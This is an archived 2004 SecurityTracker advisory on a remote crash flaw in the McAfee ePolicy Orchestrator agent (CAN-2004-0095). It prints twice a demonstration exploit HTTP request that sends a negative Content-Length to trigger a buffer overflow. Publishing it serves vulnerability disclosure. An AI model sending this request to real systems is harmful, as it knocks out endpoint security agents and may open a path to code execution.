SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Sign Up!





Category:  Application (Security)  >  ePolicy Orchestrator Vendors:  McAfee
McAfee ePolicy Orchestrator Agent Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1008847
CVE Reference:  CAN-2004-0095   (Links to External Site)
Date:  Jan 26 2004
Impact:  Denial of service via network
Exploit Included:  Yes  
Description:  A vulnerability was reported in the McAfee ePolicy Orchestrator agent software. A remote user can cause the agent to crash.

It is reported that a remote user can supply a negative Content-Length value to trigger a buffer overflow and cause the target agent to crash. It may also be possible (but not confirmed) to execute arbitrary code, the report said.

A demonstration exploit HTTP request is provided:

POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive

cyber_flash at hotmail.com is credited with reporting this flaw.

Impact:  A remote user can cause the agent to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.nai.com/us/products/mcafee/antivirus/fileserver/epo.htm (Links to External Site)
Cause:  Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003)

Message History:   None.


 Source Message Contents

Date:  Mon, 26 Jan 2004 09:55:41 -0500
Subject:  CVE: CAN-2004-0095

 

CVE: CAN-2004-0095

SecurityFocus posted a report that is credited to cyber_flash@hotmail.com regarding a 
vulnerability in the McAfee ePolicy Orchestrator agent.
						
It is reported that a remote user can trigger a buffer overflow to cause the target agent 
to crash.  It may also be possible (but not confirmed) to execute arbitrary code, the 
report said.

A demonstration exploit HTTP request is provided:

POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive


 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC